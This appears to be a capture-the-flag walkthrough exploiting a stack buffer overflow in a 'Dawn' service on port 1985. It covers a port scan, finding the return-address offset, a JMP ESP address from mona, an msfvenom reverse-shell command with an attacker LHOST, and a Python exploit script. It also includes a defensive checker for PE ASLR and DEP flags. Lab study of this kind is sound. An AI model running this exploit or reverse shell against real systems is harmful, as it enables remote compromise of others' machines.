PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
1435/tcp closed ibm-cics
1985/tcp closed hsrp
We can download dawn.zip from the "here" button on that page; after unzipping we get dawn.exe and a README.txt:
┌──(kali㉿kali)-[~/dawn]
└─$ cat README.txt
DAWN Multi Server - Version 1.1
Important:
Due the lack of implementation of the Dawn client, many issues may be experienced,
such as the message not being delivered.
In order to make sure the connection is finished and the message well received,
send a NULL-byte at the ending of your message.
Also, the service may crash after several requests.
Sorry for the inconvenience!
┌──(kali㉿kali)-[~/dawn]
└─$ file dawn.exe
dawn.exe: PE32 executable (console) Intel 80386, for MS Windows
Running dawn.exe locally under Wine with Immunity Debugger attached, we find it listening on port 1985:
┌──(kali㉿kali)-[~]
└─$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1985 0.0.0.0:* LISTEN 55655/wineserver32
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
Finding the offset to the saved return address with msf-pattern_offset (it comes out at 272 bytes, used in the exploit below):
msf-pattern_offset -l 1000 -q 316A4130
Finding a JMP ESP address with the mona script, excluding the null byte:
!mona jmp -r esp -cpb "\x00"
We get 2 addresses here; this one works well (written little-endian for the exploit):
\xba\x64\x59\x34
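Why a hard-coded JMP ESP address like this can work at all: the module that holds it was built without ASLR, so it loads at the same base every time, and a process that has not opted into DEP can execute the sled and shellcode from the stack. The following added example, not from the original writeup, reads the DllCharacteristics field of a PE optional header and reports a binary's ASLR/DEP/CFG opt-ins; the sample headers are constructed inline, and the three flag constants are the documented PE/COFF values.

```python
import struct
import sys

# DllCharacteristics bits in the PE optional header (Microsoft PE/COFF specification).
DYNAMIC_BASE = 0x0040   # image can be relocated at load time (ASLR opt-in)
NX_COMPAT    = 0x0100   # image is compatible with DEP (non-executable stack/heap)
GUARD_CF     = 0x4000   # Control Flow Guard

def pe_mitigations(data):
    """Read the optional header of a PE image and report its opt-in mitigations."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                    # skip signature and 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):            # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both formats.
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "bits": 32 if magic == 0x10B else 64,
        "aslr": bool(dllchar & DYNAMIC_BASE),
        "dep": bool(dllchar & NX_COMPAT),
        "cfg": bool(dllchar & GUARD_CF),
    }

def build_sample_header(magic, dllchar):
    """Constructed sample: a bare header holding only the fields pe_mitigations() reads."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)    # e_lfanew: NT headers follow the DOS header
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dllchar)
    return bytes(dos) + b"PE\0\0" + bytes(20) + bytes(opt)

if __name__ == "__main__":
    # With a path argument, audit a real binary; otherwise show the two constructed samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(pe_mitigations(f.read()))
    else:
        print("legacy PE32, no opt-ins:", pe_mitigations(build_sample_header(0x10B, 0x0000)))
        print("PE32+ with ASLR+DEP:   ", pe_mitigations(build_sample_header(0x20B, 0x0140)))
```

A binary whose report shows aslr False is exactly the kind of module in which a fixed address from mona stays valid across runs; the same check is what a build pipeline should fail on.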
The earlier file dawn.exe output showed a 32-bit (Intel 80386) executable, thus x86, so we generate an x86 payload with the null byte excluded:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.161 LPORT=80 EXITFUNC=thread -f c -b "\x00"
#!/usr/bin/python2
import socket

# the msfvenom -f c output above goes here as Python string literals
shellcode = ("")
offset = "A" * 272              # padding up to the saved return address (offset found above)
eip = "\xba\x64\x59\x34"        # JMP ESP address from mona, little-endian
nops = "\x90" * 32              # NOP sled in front of the shellcode
exploit = offset + eip + nops + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.161.12", 1985))
s.send(exploit)
s.close()